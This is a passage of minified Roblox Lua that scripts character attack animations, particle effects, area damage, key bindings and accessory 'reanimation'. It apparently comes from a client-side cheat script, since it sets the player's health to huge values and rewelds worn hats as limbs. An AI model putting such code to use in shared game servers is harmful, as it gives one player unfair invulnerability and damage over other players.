hit.Parent:FindFirstChild("UpperTorso")if nG and nF.Health>0 then ApplyDamage(nF,MRANDOM(nz,nA))if n9.Parent==pW then pW.Forehead.Attachment.Boom:Emit(10)end end end end)return pZ end;FireHit(pW.Forehead,2,5)FireHit(pW.Muzzle,2,5)function Smack()mB=true;mF=true;for T=0,0.2,0.1/Animation_Speed do Swait()pX.C1=Clerp(pX.C1,CF(0.1,0.1,0)*ANGLES(RAD(0),RAD(0),RAD(-15)),1/Animation_Speed)RootJoint.C0=Clerp(RootJoint.C0,mv*CF(0+0.25*SIN(mG/12),0,0+0.25*COS(mG/24))*ANGLES(RAD(-25),RAD(0),RAD(0)),1/Animation_Speed)Neck.C0=Clerp(Neck.C0,mw*CF(0,0,0+1-1)*ANGLES(RAD(25+T/15-2.5*SIN(mG/24)),RAD(0),RAD(0)),1/Animation_Speed)RightShoulder.C0=Clerp(RightShoulder.C0,CF(1.15,0.15-0.03*SIN(mG/12),0)*ANGLES(RAD(135),RAD(0),RAD(25))*mx,1/Animation_Speed)LeftShoulder.C0=Clerp(LeftShoulder.C0,CF(-1.5,0.5-0.03*SIN(mG/12),0)*ANGLES(RAD(0),RAD(0),RAD(-25))*my,1/Animation_Speed)RightHip.C0=Clerp(RightHip.C0,CF(1,-0.1,-0.7)*ANGLES(RAD(15),RAD(80),RAD(0))*ANGLES(RAD(-3),RAD(0),RAD(0)),1/Animation_Speed)LeftHip.C0=Clerp(LeftHip.C0,CF(-1,-1,0)*ANGLES(RAD(0),RAD(-80),RAD(0))*ANGLES(RAD(-3),RAD(0),RAD(0)),1/Animation_Speed)end;for T=1,100 do Swait()pX.C1=Clerp(pX.C1,CF(0.1,0.1,0)*ANGLES(RAD(0),RAD(0),RAD(-15)),1/Animation_Speed)RootJoint.C0=Clerp(RootJoint.C0,mv*CF(0+0.25*SIN(mG/12),0,0+0.25*COS(mG/24))*ANGLES(RAD(-25-T/15),RAD(0),RAD(0)),1/Animation_Speed)Neck.C0=Clerp(Neck.C0,mw*CF(0,0,0+1-1)*ANGLES(RAD(25+T/15-2.5*SIN(mG/24)),RAD(0),RAD(0)),1/Animation_Speed)RightShoulder.C0=Clerp(RightShoulder.C0,CF(1.15,0.15-0.03*SIN(mG/12),0)*ANGLES(RAD(135+T/15),RAD(0),RAD(25))*mx,1/Animation_Speed)LeftShoulder.C0=Clerp(LeftShoulder.C0,CF(-1.5,0.5-0.03*SIN(mG/12),0)*ANGLES(RAD(0),RAD(0),RAD(-25))*my,1/Animation_Speed)RightHip.C0=Clerp(RightHip.C0,CF(1,-0.1,-0.7)*ANGLES(RAD(15),RAD(80),RAD(0))*ANGLES(RAD(-3),RAD(0),RAD(0)),1/Animation_Speed)LeftHip.C0=Clerp(LeftHip.C0,CF(-1,-1,0)*ANGLES(RAD(0),RAD(-80),RAD(0))*ANGLES(RAD(-3),RAD(0),RAD(0)),1/Animation_Speed)end;CreateSound(143501853,pW.Muzzle,7,MRANDOM(8,13)/10,false)for T=0,0.15,0.1/Animation_Speed do Swait()pX.C1=Clerp(pX.C1,CF(0.1,0.1,0)*ANGLES(RAD(0),RAD(0),RAD(-15)),1/Animation_Speed)RootJoint.C0=Clerp(RootJoint.C0,mv*CF(0+0.25*SIN(mG/12),0,0+0.25*COS(mG/24))*ANGLES(RAD(45),RAD(0),RAD(0)),1/Animation_Speed)Neck.C0=Clerp(Neck.C0,mw*CF(0,0,0+1-1)*ANGLES(RAD(-15-2.5*SIN(mG/24)),RAD(0),RAD(0)),1.5/Animation_Speed)RightShoulder.C0=Clerp(RightShoulder.C0,CF(1.15,0.15-0.03*SIN(mG/12),-0.25)*ANGLES(RAD(25),RAD(0),RAD(-5))*mx,1.5/Animation_Speed)LeftShoulder.C0=Clerp(LeftShoulder.C0,CF(-1.5,0.5-0.03*SIN(mG/12),0)*ANGLES(RAD(0),RAD(0),RAD(-25))*my,1/Animation_Speed)RightHip.C0=Clerp(RightHip.C0,CF(1,-0.1,-0.7)*ANGLES(RAD(15),RAD(80),RAD(0))*ANGLES(RAD(-3),RAD(0),RAD(0)),1/Animation_Speed)LeftHip.C0=Clerp(LeftHip.C0,CF(-1,-1,0)*ANGLES(RAD(0),RAD(-80),RAD(0))*ANGLES(RAD(-3),RAD(0),RAD(0)),1/Animation_Speed)end;for T=1,3 do ApplyAoE(pW.Muzzle.Position,40*T,15,15,15,false)end;for T=1,4 do WACKYEFFECT({Time=25,EffectType="Wave",Size=VT(1,1,1),Size2=VT(36*T,15-3*T,36*T),Transparency=0,Transparency2=1,CFrame=CF(pW.Muzzle.Position),MoveToPos=nil,RotationX=0,RotationY=0,RotationZ=0,Material="Fabric",Color=BRICKC"CGA brown".Color,SoundID=nil,SoundPitch=nil,SoundVolume=nil})end;for T=1,3 do WACKYEFFECT({Time=25,EffectType="Sphere",Size=VT(1,1,1),Size2=VT(17,17,17)*T,Transparency=0.5,Transparency2=1,CFrame=CF(pW.Muzzle.Position),MoveToPos=nil,RotationX=0,RotationY=0,RotationZ=0,Material="Neon",Color=BRICKC"CGA brown".Color,SoundID=438666542,SoundPitch=MRANDOM(8,12)/10,SoundVolume=1})end;for T=0,0.45,0.1/Animation_Speed do Swait()pX.C1=Clerp(pX.C1,CF(0.1,0.1,0)*ANGLES(RAD(0),RAD(0),RAD(-15)),1/Animation_Speed)RootJoint.C0=Clerp(RootJoint.C0,mv*CF(0+0.25*SIN(mG/12),0,0+0.25*COS(mG/24))*ANGLES(RAD(45),RAD(0),RAD(0)),1/Animation_Speed)Neck.C0=Clerp(Neck.C0,mw*CF(0,0,0+1-1)*ANGLES(RAD(-15-2.5*SIN(mG/24)),RAD(0),RAD(0)),1.5/Animation_Speed)RightShoulder.C0=Clerp(RightShoulder.C0,CF(1.15,0.15-0.03*SIN(mG/12),-0.25)*ANGLES(RAD(25),RAD(0),RAD(-5))*mx,1.5/Animation_Speed)LeftShoulder.C0=Clerp(LeftShoulder.C0,CF(-1.5,0.5-0.03*SIN(mG/12),0)*ANGLES(RAD(0),RAD(0),RAD(-25))*my,1/Animation_Speed)RightHip.C0=Clerp(RightHip.C0,CF(1,-0.1,-0.7)*ANGLES(RAD(15),RAD(80),RAD(0))*ANGLES(RAD(-3),RAD(0),RAD(0)),1/Animation_Speed)LeftHip.C0=Clerp(LeftHip.C0,CF(-1,-1,0)*ANGLES(RAD(0),RAD(-80),RAD(0))*ANGLES(RAD(-3),RAD(0),RAD(0)),1/Animation_Speed)end;mB=false;mF=false end;function Rain()mB=true;mF=true;pX.Part0=Torso;pX.C0=CF(0,-1.1,-0.3)*ANGLES(RAD(15),RAD(0),RAD(-45))*CF(0,0,-0.5)local p_=true;CreateSound(305685800,Torso,7,1,false)coroutine.resume(coroutine.create(function()repeat Swait()RootJoint.C0=Clerp(RootJoint.C0,mv*CF(0+0.25*SIN(mG/12),0,0-0.1*SIN(mG/3)+0.25*COS(mG/24))*ANGLES(RAD(0),RAD(0),RAD(0)),1/Animation_Speed)Neck.C0=Clerp(Neck.C0,mw*CF(0,0,0+0.1*SIN(mG/3)+1-1)*ANGLES(RAD(0-2.5*SIN(mG/24)),RAD(0),RAD(0)),1/Animation_Speed)RightShoulder.C0=Clerp(RightShoulder.C0,CF(1.5,0.65-0.03*SIN(mG/12),0)*ANGLES(RAD(150),RAD(0),RAD(45))*mx,1/Animation_Speed)LeftShoulder.C0=Clerp(LeftShoulder.C0,CF(-1.5,0.65-0.03*SIN(mG/12),0)*ANGLES(RAD(150),RAD(0),RAD(-45))*my,1/Animation_Speed)RightHip.C0=Clerp(RightHip.C0,CF(1,-1,0)*ANGLES(RAD(0),RAD(60),RAD(0))*ANGLES(RAD(-15),RAD(0),RAD(0)),1/Animation_Speed)LeftHip.C0=Clerp(LeftHip.C0,CF(-1,-1,0)*ANGLES(RAD(0),RAD(-60),RAD(0))*ANGLES(RAD(-15),RAD(0),RAD(0)),1/Animation_Speed)until p_==false end))repeat wait(0.12)local nN,nO=Raycast(RootPart.Position,CF(RootPart.Position,RootPart.Position+VT(0,-1,0)).lookVector,15,Character)for T=1,4 do WACKYEFFECT({Time=10,EffectType="Wave",Size=VT(1,1,1),Size2=VT(10*T,15-3*T,10*T),Transparency=0,Transparency2=1,CFrame=CF(nO),MoveToPos=nil,RotationX=0,RotationY=0,RotationZ=0,Material="Fabric",Color=BRICKC"CGA brown".Color,SoundID=nil,SoundPitch=nil,SoundVolume=nil})end;ApplyAoE(nO,20,15,15,15,false)coroutine.resume(coroutine.create(function()local mU=CF(RootPart.CFrame*CF(0,25,0)*ANGLES(RAD(MRANDOM(0,360)),RAD(MRANDOM(0,360)),RAD(MRANDOM(0,360)))*CF(0,0,15).p,Mouse.Hit.p)local q0=CreatePart(3,Effects,"Neon",0,1,BRICKC("Pearl"),"Effect",VT(1,1,1),true)q0.CFrame=mU;local q1=Character.HellFire:Clone()q1.Parent=q0;for T=1,100 do q1:Emit(25)Swait()q0.CFrame=q0.CFrame*CF(0,0,-4)local nI=Raycast(q0.Position,q0.CFrame.lookVector,6,Character)if nI then for c5=1,4 do CreateSound(438666542,q0,3,MRANDOM(7,13)/10,false)ApplyAoE(q0.Position,10*c5,15,35,15,false)WACKYEFFECT({Time=25,EffectType="Sphere",Size=VT(5,5,5),Size2=VT(0,85,0),Transparency=0.5,Transparency2=1,CFrame=CF(q0.Position)*ANGLES(RAD(MRANDOM(0,360)),RAD(MRANDOM(0,360)),RAD(MRANDOM(0,360))),MoveToPos=nil,RotationX=0,RotationY=0,RotationZ=0,Material="Neon",Color=C3(1,170/255,127/255),SoundID=nil,SoundPitch=MRANDOM(8,12)/10,SoundVolume=1})WACKYEFFECT({Time=25,EffectType="Sphere",Size=VT(1,1,1),Size2=VT(20,20,20)/1.2*c5,Transparency=0.5,Transparency2=1,CFrame=CF(q0.Position),MoveToPos=nil,RotationX=0,RotationY=0,RotationZ=0,Material="Neon",Color=C3(1,170/255,127/255),SoundID=nil,SoundPitch=MRANDOM(8,12)/10,SoundVolume=1})WACKYEFFECT({Time=30,EffectType="Sphere",Size=VT(1,1,1),Size2=VT(20,20,20)*c5,Transparency=0.5,Transparency2=1,CFrame=CF(q0.Position),MoveToPos=nil,RotationX=0,RotationY=0,RotationZ=0,Material="Neon",Color=BRICKC"CGA brown".Color,SoundID=nil,SoundPitch=MRANDOM(8,12)/10,SoundVolume=1})end;break end end;Debris:AddItem(q0,5)end))until mH==false;p_=false;for T=0,0.5,0.1/Animation_Speed do Swait()pX.C1=Clerp(pX.C1,CF(0.1,0.1,0)*ANGLES(RAD(0),RAD(0),RAD(-45)),1/Animation_Speed)RootJoint.C0=Clerp(RootJoint.C0,mv*CF(0+0.25*SIN(mG/12),0,0+0.25*COS(mG/24))*ANGLES(RAD(0),RAD(0),RAD(0)),1/Animation_Speed)Neck.C0=Clerp(Neck.C0,mw*CF(0,0,0+1-1)*ANGLES(RAD(0-2.5*SIN(mG/24)),RAD(0),RAD(0)),1/Animation_Speed)RightShoulder.C0=Clerp(RightShoulder.C0,CF(1.15,0.15-0.03*SIN(mG/12),-0.5)*ANGLES(RAD(15),RAD(0),RAD(-45))*mx,1/Animation_Speed)LeftShoulder.C0=Clerp(LeftShoulder.C0,CF(-1.15,0.15-0.03*SIN(mG/12),-0.5)*ANGLES(RAD(15),RAD(0),RAD(45))*my,1/Animation_Speed)RightHip.C0=Clerp(RightHip.C0,CF(1,-1,0)*ANGLES(RAD(0),RAD(60),RAD(0))*ANGLES(RAD(-15),RAD(0),RAD(0)),1/Animation_Speed)LeftHip.C0=Clerp(LeftHip.C0,CF(-1,-1,0)*ANGLES(RAD(0),RAD(-60),RAD(0))*ANGLES(RAD(-15),RAD(0),RAD(0)),1/Animation_Speed)end;pX.Part0=RightArm;pX.C0=CF(0,-1,0)mB=false;mF=false end;function Dash()mB=true;mF=false;local fS=RootPart.CFrame;for T=0,0.7,0.1/Animation_Speed do Swait()RootPart.CFrame=RootPart.CFrame*CF(0,0,0.1)pX.C1=Clerp(pX.C1,CF(0.1,0.1,0)*ANGLES(RAD(0),RAD(0),RAD(-45)),1/Animation_Speed)RootJoint.C0=Clerp(RootJoint.C0,mv*CF(0+0.25*SIN(mG/12),0,0+0.25*COS(mG/24))*ANGLES(RAD(-15),RAD(0),RAD(0)),1/Animation_Speed)Neck.C0=Clerp(Neck.C0,mw*CF(0,0,0+1-1)*ANGLES(RAD(15-2.5*SIN(mG/24)),RAD(0),RAD(0)),1/Animation_Speed)RightShoulder.C0=Clerp(RightShoulder.C0,CF(1.15,0.15-0.03*SIN(mG/12),-0.5)*ANGLES(RAD(15),RAD(0),RAD(-45))*mx,1/Animation_Speed)LeftShoulder.C0=Clerp(LeftShoulder.C0,CF(-1.15,0.15-0.03*SIN(mG/12),-0.5)*ANGLES(RAD(15),RAD(0),RAD(45))*my,1/Animation_Speed)RightHip.C0=Clerp(RightHip.C0,CF(1,-1,0)*ANGLES(RAD(25*SIN(mG/3)),RAD(60),RAD(0))*ANGLES(RAD(-15),RAD(0),RAD(0)),1/Animation_Speed)LeftHip.C0=Clerp(LeftHip.C0,CF(-1,-1,0)*ANGLES(RAD(-25*SIN(mG/3)),RAD(-60),RAD(0))*ANGLES(RAD(-15),RAD(0),RAD(0)),1/Animation_Speed)end;local g9=0;repeat local fS=CF(RootPart.Position,VT(Mouse.Hit.p.X,RootPart.Position.Y,Mouse.Hit.p.Z))*CF(0,0,-2)Swait()g9=g9+1;RootPart.CFrame=fS;ApplyAoE(pW.Muzzle.Position,15,15,15,75,false)WACKYEFFECT({Time=10,EffectType="Wave",Size=VT(5,0,5),Size2=VT(25,1,25),Transparency=0.9,Transparency2=1,CFrame=CF(pW.Forehead.Position,Torso.Position)*ANGLES(RAD(-90),RAD(0),RAD(0)),MoveToPos=CF(pW.Forehead.Position,Torso.Position)*CF(0,0,-15).p,RotationX=0,RotationY=0,RotationZ=0,Material="Fabric",Color=C3(1,1,1),SoundID=nil,SoundPitch=nil,SoundVolume=nil})pX.C1=Clerp(pX.C1,CF(0.1,0.1,0)*ANGLES(RAD(5),RAD(0),RAD(-45)),1/Animation_Speed)RootJoint.C0=Clerp(RootJoint.C0,mv*CF(0+0.25*SIN(mG/12),0,0+0.25*COS(mG/6))*ANGLES(RAD(75),RAD(0),RAD(0)),1/Animation_Speed)Neck.C0=Clerp(Neck.C0,mw*CF(0,0,0+1-1)*ANGLES(RAD(-50-2.5*SIN(mG/24)),RAD(0),RAD(0)),1/Animation_Speed)RightShoulder.C0=Clerp(RightShoulder.C0,CF(1.15,0.15-0.03*SIN(mG/12),-0.5)*ANGLES(RAD(85),RAD(0),RAD(-45))*mx,1/Animation_Speed)LeftShoulder.C0=Clerp(LeftShoulder.C0,CF(-1.15,0.15-0.03*SIN(mG/12),-0.5)*ANGLES(RAD(85),RAD(0),RAD(45))*my,1/Animation_Speed)RightHip.C0=Clerp(RightHip.C0,CF(1,-1,0)*ANGLES(RAD(65),RAD(60),RAD(0))*ANGLES(RAD(-15),RAD(0),RAD(0)),1/Animation_Speed)LeftHip.C0=Clerp(LeftHip.C0,CF(-1,-1,0)*ANGLES(RAD(65),RAD(-60),RAD(0))*ANGLES(RAD(-15),RAD(0),RAD(0)),1/Animation_Speed)until mH==false and g9>50;local nN,nO=Raycast(RootPart.Position,CF(RootPart.Position,RootPart.Position+VT(0,-1,0)).lookVector,15,Character)WACKYEFFECT({Time=60,EffectType="Sphere",Size=VT(25,25,25),Size2=VT(0,0,0),Transparency=1,Transparency2=0,CFrame=CF(RootPart.Position),MoveToPos=nil,RotationX=0,RotationY=0,RotationZ=0,Material="Neon",Color=C3(1,1,1),SoundID=971125740,SoundPitch=MRANDOM(8,12)/10,SoundVolume=3})for T=1,5 do ApplyAoE(RootPart.Position,13,15,25,15,false)WACKYEFFECT({Time=30,EffectType="Ring",Size=VT(0,0,0),Size2=VT(1,1,0)*T,Transparency=0,Transparency2=1,CFrame=CF(nO)*ANGLES(RAD(90),RAD(0),RAD(0)),MoveToPos=nil,RotationX=0,RotationY=0,RotationZ=0,Material="Neon",Color=C3(0,0,0),SoundID=nil,SoundPitch=MRANDOM(8,12)/10,SoundVolume=1})WACKYEFFECT({Time=30,EffectType="Sphere",Size=VT(1,1,1),Size2=VT(5,5,5)*T,Transparency=0,Transparency2=1,CFrame=CF(RootPart.Position),MoveToPos=nil,RotationX=0,RotationY=0,RotationZ=0,Material="Neon",Color=C3(0,0,0),SoundID=nil,SoundPitch=MRANDOM(8,12)/10,SoundVolume=1})end;RootPart.CFrame=fS;local nN,nO=Raycast(RootPart.Position,CF(RootPart.Position,RootPart.Position+VT(0,-1,0)).lookVector,15,Character)WACKYEFFECT({Time=60,EffectType="Sphere",Size=VT(25,25,25),Size2=VT(0,0,0),Transparency=1,Transparency2=0,CFrame=CF(RootPart.Position),MoveToPos=nil,RotationX=0,RotationY=0,RotationZ=0,Material="Neon",Color=C3(1,1,1),SoundID=971125740,SoundPitch=MRANDOM(8,12)/10,SoundVolume=3})for T=1,5 do ApplyAoE(RootPart.Position,13,15,25,15,false)WACKYEFFECT({Time=30,EffectType="Ring",Size=VT(0,0,0),Size2=VT(1,1,0)*T,Transparency=0,Transparency2=1,CFrame=CF(nO)*ANGLES(RAD(90),RAD(0),RAD(0)),MoveToPos=nil,RotationX=0,RotationY=0,RotationZ=0,Material="Neon",Color=C3(0,0,0),SoundID=nil,SoundPitch=MRANDOM(8,12)/10,SoundVolume=1})WACKYEFFECT({Time=30,EffectType="Sphere",Size=VT(1,1,1),Size2=VT(5,5,5)*T,Transparency=0,Transparency2=1,CFrame=CF(RootPart.Position),MoveToPos=nil,RotationX=0,RotationY=0,RotationZ=0,Material="Neon",Color=C3(0,0,0),SoundID=nil,SoundPitch=MRANDOM(8,12)/10,SoundVolume=1})end;mB=false;mF=false end;function AttackTemplate()mB=true;mF=false;for T=0,1,0.1/Animation_Speed do Swait()pX.C1=Clerp(pX.C1,CF(0.1,0.1,0)*ANGLES(RAD(0),RAD(0),RAD(-45)),1/Animation_Speed)RootJoint.C0=Clerp(RootJoint.C0,mv*CF(0+0.25*SIN(mG/12),0,0+0.25*COS(mG/24))*ANGLES(RAD(0),RAD(0),RAD(0)),1/Animation_Speed)Neck.C0=Clerp(Neck.C0,mw*CF(0,0,0+1-1)*ANGLES(RAD(0-2.5*SIN(mG/24)),RAD(0),RAD(0)),1/Animation_Speed)RightShoulder.C0=Clerp(RightShoulder.C0,CF(1.15,0.15-0.03*SIN(mG/12),-0.5)*ANGLES(RAD(15),RAD(0),RAD(-45))*mx,1/Animation_Speed)LeftShoulder.C0=Clerp(LeftShoulder.C0,CF(-1.15,0.15-0.03*SIN(mG/12),-0.5)*ANGLES(RAD(15),RAD(0),RAD(45))*my,1/Animation_Speed)RightHip.C0=Clerp(RightHip.C0,CF(1,-1,0)*ANGLES(RAD(0),RAD(60),RAD(0))*ANGLES(RAD(-15),RAD(0),RAD(0)),1/Animation_Speed)LeftHip.C0=Clerp(LeftHip.C0,CF(-1,-1,0)*ANGLES(RAD(0),RAD(-60),RAD(0))*ANGLES(RAD(-15),RAD(0),RAD(0)),1/Animation_Speed)end;mB=false;mF=false end;W(R.Broom.Handle,Character.Stic.Stick)W(R.Horse.Handle,Character.Stic.Stick)W(S.Fiyah.Handle,Character.Stic.Stick)R.Broom.Handle.Attachment.Orientation=Vector3.new(0,0,150)S.Fiyah.Handle.Attachment.Orientation=Vector3.new(-90,-180,0)Character.Stic:WaitForChild("Stick"):FindFirstChild("Attachment").Name="Attachment69"Character.Stic:WaitForChild("Stick"):FindFirstChild("Attachment").Name="Attachment420"Character.Stic:WaitForChild("Stick"):FindFirstChild("Attachment").Name="Attachment1337"Character.Stic:WaitForChild("Stick").Attachment69.Position=Vector3.new(0,-1,0)Character.Stic:WaitForChild("Stick").Attachment420.Position=Vector3.new(0.25,3,-0.2)Character.Stic:WaitForChild("Stick").Attachment1337.Position=Vector3.new(0.25,3,0.05)FakeChar.fff_fox:Destroy()Character.Eyeball:Destroy()Character.Eyeball:Destroy()Character.Stic.Chin.HellFire:Destroy()Character.Stic.Forehead.HellFire:Destroy()Character.Stic.Muzzle.PointLight:Destroy()function MouseDown(Mouse)if mB==false then end end;function MouseUp(Mouse)mD=false end;function KeyDown(n_)mH=true;if n_=="z"and mB==false then Smack()end;if n_=="c"and mB==false then Dash()end;if n_=="v"and mB==false then end;if n_=="x"and mB==false then end end;function KeyUp(n_)mH=false end;Mouse.Button1Down:connect(function(nW)MouseDown(nW)end)Mouse.Button1Up:connect(function(nW)MouseUp(nW)end)Mouse.KeyDown:connect(function(nW)KeyDown(nW)end)Mouse.KeyUp:connect(function(nW)KeyUp(nW)end)function unanchor()for U,c in pairs(Character:GetChildren())do if c:IsA("BasePart")and c~=RootPart then c.Anchored=false end end;if mQ==true then RootPart.Anchored=false else RootPart.Anchored=true end end;Humanoid.Changed:connect(function(o0)if o0=="Jump"and Disable_Jump==true then Humanoid.Jump=false end end)local q2=0;while true do Swait()mP.Parent=nil;for U,v in next,Humanoid:GetPlayingAnimationTracks()do v:Stop()end;Humanoid.HipHeight=1.3;mG=mG+mI;local o1=(RootPart.Velocity*VT(1,0,1)).magnitude;local o2=RootPart.Velocity.y;if o2>40 then o2=40 elseif o2<-20 then o2=-20 end;if mB==false then if o1<1 then pX.C1=Clerp(pX.C1,CF(0.1,0.1,0)*ANGLES(RAD(0),RAD(0),RAD(-45)),1/Animation_Speed)RootJoint.C0=Clerp(RootJoint.C0,mv*CF(0+0.25*SIN(mG/12),0,0+0.25*COS(mG/24))*ANGLES(RAD(-o2),RAD(0),RAD(0)),1/Animation_Speed)Neck.C0=Clerp(Neck.C0,mw*CF(0,0,0+1-1)*ANGLES(RAD(0-2.5*SIN(mG/24)),RAD(0),RAD(0)),1/Animation_Speed)RightShoulder.C0=Clerp(RightShoulder.C0,CF(1.15,0.15-0.03*SIN(mG/12),-0.5)*ANGLES(RAD(15),RAD(0),RAD(-45))*mx,1/Animation_Speed)LeftShoulder.C0=Clerp(LeftShoulder.C0,CF(-1.15,0.15-0.03*SIN(mG/12),-0.5)*ANGLES(RAD(15),RAD(0),RAD(45))*my,1/Animation_Speed)RightHip.C0=Clerp(RightHip.C0,CF(1,-1,0)*ANGLES(RAD(0),RAD(60),RAD(0))*ANGLES(RAD(-15),RAD(0),RAD(0)),1/Animation_Speed)LeftHip.C0=Clerp(LeftHip.C0,CF(-1,-1,0)*ANGLES(RAD(0),RAD(-60),RAD(0))*ANGLES(RAD(-15),RAD(0),RAD(0)),1/Animation_Speed)elseif o1>1 then pX.C1=Clerp(pX.C1,CF(0.1,0.1,0)*ANGLES(RAD(0),RAD(0),RAD(-45)),1/Animation_Speed)RootJoint.C0=Clerp(RootJoint.C0,mv*CF(0+0.25*SIN(mG/12),0,0+0.25*COS(mG/24))*ANGLES(RAD(35-o2),RAD(0),RAD(0)),1/Animation_Speed)Neck.C0=Clerp(Neck.C0,mw*CF(0,0,0+1-1)*ANGLES(RAD(-25-2.5*SIN(mG/24)),RAD(0),RAD(0)),1/Animation_Speed)RightShoulder.C0=Clerp(RightShoulder.C0,CF(1.15,0.15-0.03*SIN(mG/12),-0.5)*ANGLES(RAD(50),RAD(0),RAD(-45))*mx,1/Animation_Speed)LeftShoulder.C0=Clerp(LeftShoulder.C0,CF(-1.15,0.15-0.03*SIN(mG/12),-0.5)*ANGLES(RAD(50),RAD(0),RAD(45))*my,1/Animation_Speed)RightHip.C0=Clerp(RightHip.C0,CF(1,-1,0)*ANGLES(RAD(0),RAD(60),RAD(0))*ANGLES(RAD(-15),RAD(0),RAD(0)),1/Animation_Speed)LeftHip.C0=Clerp(LeftHip.C0,CF(-1,-1,0)*ANGLES(RAD(0),RAD(-60),RAD(0))*ANGLES(RAD(-15),RAD(0),RAD(0)),1/Animation_Speed)end end;unanchor()Humanoid.MaxHealth=2e6;Humanoid.Health=2e6;if mF==false then Disable_Jump=false;Humanoid.WalkSpeed=l elseif mF==true then Disable_Jump=true;Humanoid.WalkSpeed=0 end;mu.SoundId="rbxassetid://608009445"mu.Looped=true;mu.Pitch=1;mu.Volume=0.5;mu.Parent=Character;mu.Playing=true;Humanoid.DisplayDistanceType="None"if Head:FindFirstChildOfClass("Sound")then Head:FindFirstChildOfClass("Sound"):remove()end;q2=q2+1;if q2>=650 then q2=0;Blink()end;if Head:FindFirstChild("face")then Head.face.Texture="rbxassetid://403870689"end;for U,c in pairs(Character:GetDescendants())do if c.ClassName=="Accessory"then if c.Handle:FindFirstChild("HairAttachment")==nil then end end end end end)end;function Clickey13()pcall(function()local Player=game:GetService("Players").LocalPlayer;local Character=Player.Character;Character["Bang w bun"].Name="Bang w bun"Character["Bang w bun"].Name="Bang w bun1"Character["Bang w bun"].Name="Bang w bun2"local R={rightarm=Character:WaitForChild("Bang w bun"),leftarm=Character:WaitForChild("Bang w bun1"),rightleg=Character:WaitForChild("Bang w bun2"),leftleg=Character:WaitForChild("BoyAnimeHair"),torso=Character:WaitForChild("Cyber Peacock Tail 2.0"),head=Character:WaitForChild("AnimeShortHairAccessory9")}for T,v in next,R do v.Handle.AccessoryWeld:Remove()for U,V in next,v:GetDescendants()do if V:IsA("Mesh")or V:IsA("SpecialMesh")then V:Remove()end end end;local function W(T,v)local X=Instance.new("Attachment",T)X.Position=Vector3.new(0,0,0)local Y=Instance.new("Attachment",v)Y.Position=Vector3.new(0,0,0)local Z=Instance.new("AlignPosition",T)Z.Attachment0=X;Z.Attachment1=Y;Z.RigidityEnabled=false;Z.ReactionForceEnabled=false;Z.ApplyAtCenterOfMass=true;Z.MaxForce=9999999;Z.MaxVelocity=math.huge;Z.Responsiveness=math.huge;local _=Instance.new("AlignOrientation",T)_.Attachment0=X;_.Attachment1=Y;_.ReactionTorqueEnabled=true;_.PrimaryAxisOnly=false;_.MaxTorque=9999999;_.MaxAngularVelocity=math.huge;_.Responsiveness=math.huge;Y.Orientation=Vector3.new(90,0,0)end;coroutine.resume(coroutine.create(function()while true do wait(0.1)for T,v in pairs(game:GetService("Players").LocalPlayer.Character:GetChildren())do if v.Name=="Tors"then v.Transparency=1 end end end end))local p=game:GetService("Players").LocalPlayer;local char=p.Character;local mouse=p:GetMouse()local bk=char["Left Arm"]local bl=char["Right Arm"]local bi=char["Left Leg"]local bj=char["Right Leg"]local bm=char.Head;local torso=char.Torso;local hum=char.Humanoid;local cam=game:GetService("Workspace").CurrentCamera;local lf=char.HumanoidRootPart;local q3=false;local q4=0;local q5=game:GetService("Lighting")local rs=game:GetService("RunService").RenderStepped;local q6="Normal"local q7=math.rad;local q8=false;local q9=false;math.randomseed(os.time())hum.WalkSpeed=16;char.Health:Destroy()hum.MaxHealth=math.huge;wait(0.1)hum.Health=math.huge;Debounces={on=false,ks=false,CanAttack=true,CanJoke=true,NoIdl=false,Slashing=false,Slashed=false,Grabbing=false,Grabbed=false}local qa={char.Name}function lerp(a,b,t)return a+(b-a)*t end;function slerp(a,b,t)dot=a:Dot(b)if dot>0.99999 or dot<-0.99999 then return t<=0.5 and a or b else r=math.acos(dot)return(a*math.sin((1-t)*r)+b*math.sin(t*r))/math.sin(r)end end;function matrixInterpolate(a,b,t)local iq,ir,is,qb,qc,qd,qe,qf,qg,qh,qj,qk=a:components()local iu,iv,iw,ql,qm,qn,qo,qp,qq,qr,qs,qt=b:components()local qu=lerp(Vector3.new(iq,ir,is),Vector3.new(iu,iv,iw),t)local qv=slerp(Vector3.new(qb,qc,qd),Vector3.new(ql,qm,qn),t)local eM=slerp(Vector3.new(qe,qf,qg),Vector3.new(qo,qp,qq),t)local v3=slerp(Vector3.new(qh,qj,qk),Vector3.new(qr,qs,qt),t)local t=qv:Dot(eM)if not(t<0 or t==0 or t>0)then return CFrame.new()end;return CFrame.new(qu.x,qu.y,qu.z,qv.x,qv.y,qv.z,eM.x,eM.y,eM.z,v3.x,v3.y,v3.z)end;function genWeld(a,b)local c4=Instance.new("Weld",a)c4.Part0=a;c4.Part1=b;return c4 end;function weld(a,b)local weld=Instance.new("Weld")weld.Name="W"weld.Part0=a;weld.Part1=b;weld.C0=a.CFrame:inverse()*b.CFrame;weld.Parent=a;return weld end;function Lerp(dG,qw,qx)local bV={dG.X,dG.Y,dG.Z,dG:toEulerAnglesXYZ()}local bW={qw.X,qw.Y,qw.Z,qw:toEulerAnglesXYZ()}for T,v in pairs(bV)do bV[T]=v+(bW[T]-v)*qx end;return CFrame.new(bV[1],bV[2],bV[3])*CFrame.Angles(select(4,unpack(bV)))end;newWeld=function(cd,ce,cg,ch,ci)local cc=Instance.new("Weld",ce)cc.Part0=cd;cc.Part1=ce;cc.C0=CFrame.new(cg,ch,ci)end;for T,v in pairs(bm:children())do if v:IsA("Sound")then v:Destroy()end end;function HasntTouched(qy)local qz=true;for U,v in pairs(qa)do if v==qy then qz=false end end;return qz end;bk.Size=bk.Size*2;bl.Size=bl.Size*2;bi.Size=bi.Size*2;bj.Size=bj.Size*2;torso.Size=torso.Size*2;bm.Size=bm.Size*2;lf.Size=lf.Size*2;newWeld(torso,bk,-1.5,0.5,0)bk.Weld.C1=CFrame.new(0,0.5,0)newWeld(torso,bl,1.5,0.5,0)bl.Weld.C1=CFrame.new(0,0.5,0)newWeld(torso,bm,0,1.5,0)newWeld(torso,bi,-0.5,-1,0)bi.Weld.C1=CFrame.new(0,1,0)newWeld(torso,bj,0.5,-1,0)bj.Weld.C1=CFrame.new(0,1,0)newWeld(lf,torso,0,-1,0)torso.Weld.C1=CFrame.new(0,-1,0)z=Instance.new("Sound",char)z.SoundId="rbxassetid://449048980"z.Looped=true;z.Pitch=1;z.Volume=1;wait(.01)z:Play()wait(0.1)p.Character.Head.BrickColor=BrickColor.new("Really black")p.Character.Torso.BrickColor=BrickColor.new("Really black")p.Character["Right 